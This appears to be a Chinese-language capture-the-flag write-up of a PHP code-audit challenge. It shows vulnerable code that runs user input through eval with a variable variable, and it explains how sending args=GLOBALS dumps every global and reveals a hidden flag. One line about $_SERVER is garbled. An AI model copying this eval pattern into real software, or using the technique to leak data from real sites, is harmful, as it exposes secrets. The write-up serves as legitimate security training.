這是一道代碼審計。
flag In the variable ! <?php
error_reporting(0);
include "flag1.php";
highlight_file(file);
if(isset($_GET['args'])){
$args = $_GET['args'];
if(!preg_match("/^\w+$/",$args)){
die("args error!");
}
eval("var_dump($$args);");
}
?>
抓住兩個地方,一個是正則表達式匹配,不匹配則直接die,該正則表達式應該是匹配都是字母的串。然后最關鍵的是最后的$$args,這是可變變量的意思,如$args的值是另一個變量的變量名。那么$$args就代表另一個變量。所以我們就給args賦值一個變量名,那么PHP的九大全局變量,一個一個試。
- $_POST [用於接收post提交的數據]
- $_GET [用於獲取url地址欄的參數數據]
- $_FILES [用於文件就收的處理img 最常見]
- $_COOKIE [用於獲取與setCookie()中的name 值]
- $_SESSION [用於存儲session的值或獲取session中的值]
- $_REQUEST [具有get,post的功能,但比較慢]
- SERVER[是預定義服務器變量的一種,所有SERVER[是預定義服務器變量的一種,所有_SERVER [是預定義服務器變量的一種,所有_SERVER開頭的都
- $GLOBALS [一個包含了全部變量的全局組合數組]
- $_ENV [ 是一個包含服務器端環境變量的數組。它是PHP中一個超級全局變量,我們可以在PHP 程序的任何地方直接訪問它]
當args=GLOBALS時,flag出現。
array(7) { ["GLOBALS"]=> RECURSION ["_POST"]=> array(0) { } ["_GET"]=> array(1) { ["args"]=> string(7) "GLOBALS" } ["_COOKIE"]=> array(0) { } ["_FILES"]=> array(0) { } ["ZFkwe3"]=> string(38) "flag{92853051ab894a64f7865cf3c2128b34}" ["args"]=> string(7) "GLOBALS" }